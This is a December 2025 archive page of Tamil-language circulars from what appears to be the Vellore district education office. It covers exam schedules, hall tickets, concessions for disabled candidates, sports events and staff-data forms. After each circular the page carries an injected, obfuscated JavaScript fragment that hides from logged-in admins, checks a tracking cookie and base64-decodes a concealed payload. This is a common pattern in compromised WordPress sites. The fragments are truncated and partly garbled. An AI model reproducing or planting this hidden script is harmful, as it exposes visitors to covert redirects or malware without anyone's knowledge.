Month: December 2025

பள்ளிக்கல்வித்துறை –தேர்வுகள் –வேலூர் மாவட்டம் -2025-26 கல்வியாண்டு –6 முதல் 12 ஆம் வகுப்பு  மாணவர்களுக்கு அரையாண்டுத் தேர்வுகள் நடத்துதல் மற்றும் தலைமை ஆசிரியர்களுக்கு அறிவுரை –வழங்குதல் –சார்பு 

4379 HALF YEARLY PROCEEDINGSDownload DocScanner 20 Nov 2025 18-43Download (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

தேர்வுகள் –வேலூர் மாவட்டம் –தமிழ்நாடு ஊரகப்பகுதி திறனாய்வுத் தேர்வு(TRUST EXAMINATION ) –நவம்பர்  2025 –06.12.2025 –தேர்வுமைய பெயர்பட்டியல் மற்றும் தேர்வுக் கூட நுழைவுச் சீட்டுகள் (REVISED ) பதிவிறக்கம் செய்தல் –சார்பு

TRUST HALL TICKET PROCEEDINGDownload 8272_TRUST_-_CENTRE_ALLOTED_2025-11-11_122747Download (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

தேர்வுகள் –வேலூர் மாவட்டம்- மார்ச்-2026 மேல்நிலை இரண்டாமாண்டு / மேல்நிலை முதலாமாண்டு (ARREAR) பொதுத் தேர்வு மாற்றுத்திறனாளி பள்ளி மாணாக்கர்கள் – தேர்வு நேரத்தில் சலுகைகள் கோரும் விண்ணப்பங்கள் வரவேற்றல் குறித்து.

+1 & +2 ph candidate proceedingDownload form 1Download form 2Download G.O MS NO.62Download differently-abled-exemption-pdfDownload (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

பள்ளிக் கல்வி-வேலூர் மாவட்டம்- உடற்கல்வி- 2025-2026 ஆம் கல்வியாண்டில் மாநில அளவிலான 66வது குடியரசு தின குழு விளையாட்டுப் போட்டிகள்(RDG) -நடைபெறும் இடம் தேதி போன்ற விவரங்கள் தெரிவித்தல்-சார்பு.

சார்ந்த பள்ளி தலைமையாசிரியர்/முதல்வர்கள் கவனத்திற்கு. Google Map Link: https://maps.app.goo.gl/A6nisoeFu4M1R2sP8 trichy.RDG (1)Download RDG RESULTS 25-26.U.17Download _66th RDG-OfficialsDownload Team.manager.instructionsDownload SOP for Protection of Girls in Sports_ Instructions (1)Download /ஒப்பம்/ முதன்மைக் கல்வி அலுவலர் வேலூர். (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

slip test -02.12.2025 -sslc & 12th std -question set -reg

XII PHYSICS -02.12.2025Download XII ECONOMICS -02.12.2025Download slip test 8Download (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

பள்ளிக் கல்வி –   வேலூர் மாவட்டம் – தமிழ்நாடு அமைச்சுப்பணி –  பள்ளிக் கல்வித் துறையின் கீழ் செயல்படும் அனைத்து அரசு / நகராட்சி உயர், மேல்நிலைப் பள்ளிகள் – ஆசிரியரில்லாத பணியாளர்களின் விபரங்கள்  இணைப்பிலுள்ள கூகுள் படிவத்தில் பூர்த்தி செய்தல் – சார்பு.

https://docs.google.com/spreadsheets/d/1VhpN9LBLwcbKBrv76H7L5mTnIxHGS472J0tT2k9JS9Q/edit?usp=sharing 5864 A1 2025 NON TEACHING STAFF DETAILSDownload முதன்மைக் கல்வி அலுவலர், வேலூர் மாவட்டம். (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

பள்ளிக் கல்வி – வேலூர் மாவட்டம் – SMC மூலம் பணிநியமனம் செய்யப்பட்ட தற்காலிக பட்டதாரி ஆசிரியர்கள் மற்றும் முதுகலையாசிரியர்கள் 2025 நவம்பர் மாதம் பணிபுரிந்த விவரம் – கோருதல் – தொடர்பாக.

SMC மூலம் பணிநியமனம் செய்யப்பட்ட தற்காலிக பட்டதாரி ஆசிரியர்கள் மற்றும் முதுகலையாசிரியர்கள் நவம்பர் 2025 மாதத்தில் பணிபுரிந்த விவரம் மற்றும் அதற்கான காரணம் ஆகியவற்றை இத்துடன் இணைக்கப்பட்டுள்ள படிவத்தில் பூர்த்தி செய்து நவம்பர் 2025 மாதத்தின் தெளிவான வருகைப் பதிவேட்டின் நகலை இணைத்து தனிநபர் மூலமாக 02.12.2025 அன்று மாலை 05.00 மணிக்குள் இவ்வலுவலகத்தில் மறுநினைவூட்டுக்கு இடமின்றி தவறாமல் சமர்ப்பிக்குமாறு அனைத்து அரசு/நகரவை/உயர்/மேல்நிலைப்பள்ளி தலைமையாசிரியர்களுக்கு தெரிவிக்கப்படுகிறது. SMC பணியாளர்களின் அசல் வருகைப் பதிவேடு தவறாமல் சரிபார்ப்பிற்காக அலுவலகத்திற்கு உடன் கொடுத்தனுப்ப வேண்டும் என சார்ந்த பள்ளி தலைமையாசிரியர்களுக்கு தெரிவிக்கப்படுகிறது. மேலும் அக்டோபர் 2025 மாதத்திற்கு ஊதியம் பெற்று வழங்கிய ECS நகல் மற்றும் பற்றுச்சீட்டுடன் இணைத்து சமர்ப்பிக்குமாறும் அனைத்து அரசு/நகரவை/உயர்/மேல்